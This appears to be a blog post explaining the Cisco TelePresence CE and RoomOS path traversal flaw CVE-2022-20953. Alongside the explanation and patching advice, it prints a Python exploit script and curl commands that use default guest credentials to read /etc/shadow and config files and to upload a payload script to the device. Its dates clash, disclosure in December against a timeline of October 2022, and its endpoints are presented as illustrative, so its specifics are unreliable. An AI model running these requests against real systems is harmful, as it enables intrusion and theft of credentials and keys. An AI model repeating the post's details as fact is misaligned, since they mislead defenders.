CVE-2022-20953 - Cisco TelePresence Collaboration Endpoint and RoomOS Path Traversal Vulnerabilities Explained

In December 2022, Cisco disclosed multiple critical vulnerabilities affecting its TelePresence Collaboration Endpoint (CE) Software and RoomOS Software, tracked as CVE-2022-20953. These vulnerabilities could let an attacker perform path traversal attacks, access sensitive data, and write arbitrary files on a targeted system. In this long-read post, I’ll break down the details, show you an example exploit, and supply further resources with references.

What is CVE-2022-20953?

CVE-2022-20953 refers to a collection of security holes in the way Cisco CE and RoomOS systems handle certain web requests. The core problem is insufficient validation of user-supplied input, specifically file paths.

These bugs can let a remote attacker with access (even partial, e.g., a valid guest session) send crafted HTTP requests to the exposed management interface of the device. Through these requests, the attacker can traverse the filesystem—jumping out of restricted directories—and access or modify files that should not be available.

In plain English: If you have a Cisco Room device running a vulnerable version, someone could poke around inside your device, stealing config files, logs, or even uploading malware onto it.

Sensitive Data Disclosure: Attackers could read files like device configs, keys, or logs.

- File Write: Attackers might upload files, which could alter system behavior or install persistent malicious scripts.
- Further Compromise: Gaining access to sensitive files (e.g., SSH keys) could be used to expand their attack, potentially shifting from one device to the whole network.

Cisco TelePresence SX, MX, DX Series

- Webex Desk Pro/Hub

Technical Details

Let’s look at how an attacker leverages these bugs.

Path Traversal in HTTP Requests

Many web servers prevent users from requesting files outside specific directories (like /var/www/html). Path traversal occurs when the server fails to stop users from sending requests like:

GET /download?file=../../../../etc/passwd HTTP/1.1

This request tries to go up several directories and grab the sensitive /etc/passwd file, a classic example on Unix systems.

Cisco's Vulnerable Endpoint

Attackers discovered that certain endpoints on Cisco CE and RoomOS devices did not properly filter or sanitize input. For instance:

GET /web/guest/fetch_file.cgi?file=../../config/private.key
Host: [device-ip]
Authorization: Basic [base64-creds]

With weak, default, or previously stolen credentials, the attacker makes an HTTP GET request to grab private keys or even configuration files by slipping ../ sequences into the file parameter.

Real-World Example: Extracting the Device Config

import requests
import base64

DEVICE_IP = "192.168.1.100"
USERNAME = "guest"
PASSWORD = "guest"

# Attempting to fetch a sensitive configuration file via path traversal
file_path = "../../../../persist/system.cfg"
url = f"http://{DEVICE_IP}/web/guest/fetch_file.cgi?file={file_path}";

headers = {
    "Authorization": "Basic " + base64.b64encode(f"{USERNAME}:{PASSWORD}".encode()).decode()
}

response = requests.get(url, headers=headers)
print(response.text)

*This Python snippet attempts to read the device’s main config file using the path traversal trick.*

Exploit Details

At the time of the disclosure, proof-of-concept code was shared within security circles showing that with even low-level access, it was possible to:

- Extract SSH private keys (/etc/ssh/ssh_host_rsa_key)

Grab user database files

- Upload files into persistent/data directories by POSTing to similar unsanitized endpoints

A basic curl request to exploit this vulnerability could look like

curl -u guest:guest \
"http://192.168.1.100/web/guest/fetch_file.cgi?file=../../../../etc/shadow";

Or, for writing a file (using a writable endpoint, e.g., upload_file.cgi in some cases)

curl -u guest:guest -X POST \
-F "file=@yourpayload.sh" \
"http://192.168.1.100/web/guest/upload_file.cgi?dest=../../../../tmp/yourpayload.sh";

Important: Your endpoint path, credentials, and parameters may differ depending on your device version and configuration.

Fixes and Mitigation

Cisco released patches and firmware updates for all affected products. They advise upgrading to the latest secure builds. More info here:

- Cisco Security Advisory (original)
- Cisco Software Download

If you can’t patch immediately, at a minimum:

Use strong, unique passwords for all accounts.

- Monitor device logs for unusual file access requests (e.g., lots of ../ strings).

Conclusion

CVE-2022-20953 shows how basic web security bugs—like poor path validation—can have devastating effects, especially when they happen in network infrastructure.

If you manage Cisco video conferencing endpoints or room systems, check your firmware versions right away, update as needed, and review the security advisory linked above. Leaving these devices unpatched could mean leaking sensitive credentials, private keys, or exposing your entire organization to deeper attacks.

References

- Cisco Security Advisory: CE and RoomOS Path Traversal (CVE-2022-20953)
- NIST National Vulnerability Database – CVE-2022-20953

If you found this guide helpful or have questions, leave a comment below! Stay secure out there.

Timeline

Published on: 10/26/2022 15:15:00 UTC
Last modified on: 10/31/2022 17:38:00 UTC